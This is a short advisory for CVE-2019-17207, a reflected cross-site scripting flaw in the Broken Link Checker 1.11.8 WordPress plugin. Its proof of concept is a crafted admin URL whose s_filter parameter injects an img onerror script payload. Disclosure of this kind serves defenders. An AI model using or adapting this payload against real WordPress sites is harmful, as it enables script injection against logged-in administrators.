WordPress Broken Link Checker 1.11.8 Cross Site Scripting

2019.10.17

Credit: Ismail Doe

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2019-17207

CWE: CWE-79

Document Title
===============
Reflected XSS via `Broken Link Checker` v.1.11.8 WordPress plugin.

Product Description
===============
Broken Link Checker will monitor your blog looking for broken links and let
you know if any are found.

Homepage: https://managewp.com/
WordPress Plugin: https://wordpress.org/plugins/broken-link-checker/

PoC
===============

1) Login to your wordpress webpage
2) Navigate to the following page (Make sure the `s_link_text` parameter
returns a valid link on your blog:

http://localhost:8889/wp-admin/tools.php?page=view-broken-links&filter_id=search&s_link_text=word&s_link_url&s_http_code&s_filter=%27%3E%22%3E%3Cimg%20src%3D1%20onerror%3Dalert(1337)%3E&s_link_type&search_button=Search+Links

3) Note the form alerts and the payload within the `s_filter` parameter
executed.


CVE-2019-17207

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress Broken Link Checker 1.11.8 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.